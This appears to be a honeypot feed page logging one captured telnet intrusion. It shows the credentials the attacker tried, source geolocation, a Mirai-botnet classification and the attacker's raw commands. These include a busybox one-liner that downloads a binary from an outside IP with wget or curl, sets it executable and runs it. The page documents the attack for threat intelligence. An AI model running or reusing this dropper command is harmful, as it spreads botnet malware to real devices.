HoneyMire Hub

Attack #6193 telnet

Captured 2026-05-11 16:32:50Z by Ka on honeypot HoneyMistNano 🟡 C3 SuperMini · firmware 1.

Source160.30.142.210:56656
Authenticatedyes
Commands11
Duration3.7s

Session recording

Loading session…

Transcript

Server output and attacker input as captured, line-grain. The asciicast above is the cinematic version of the same data; everything below is the raw conversation. Captured credentials live in the Credentials card; this transcript starts where the shell session does.

mother
fucker
start
enable
config terminal
system
linuxshell
su
shell
sh
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x56\x46\x44\x51\x57\x59'
/bin/busybox wget;/bin/busybox echo -ne '\x56\x46\x44\x51\x57\x59'
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://27.223.137.31:52701/i ||curl -O http://27.223.137.31:52701/i ||/bin/busybox wget http://27.223.137.31:52701/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x59\x49\x47\x45\x54\x49\x42\x44'

Credentials

Username: mother

Password: fucker

1 login attempt(s) before disconnect.

Geolocation hub-resolved

🇵🇰Pakistan · Punjab · Gujrat

Muhammad Akbar · AS142647 Nasstec Airnet Networks Private Limited · 32.57,74.08

Behavioral classification

🦠 95% confidence

Mirai-family IoT botnet — wget + chmod + exec; tries common router/IP-cam credentials.

Command summary

start
enable
config terminal
system
linuxshell
su
shell
sh
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x56\x46\x44\x51\x57\x59'
/bin/busybox wget;/bin/busybox echo -ne '\x56\x46\x44\x51\x57\x59'
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://27.223.137.31:52701/i ||curl -O http://27.223.137.31:52701/i ||/bin/busybox wget http://27.223.137.31:52701/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x59\x49\x47\x45\x54\x49\x42\x44'

Reported to threat intel

AlienVault OTX ✓

HoneyMire Hub · open feed: / · API: /api · docs: /docs · about: /about · firmware: github.com/KaSt/HoneyMire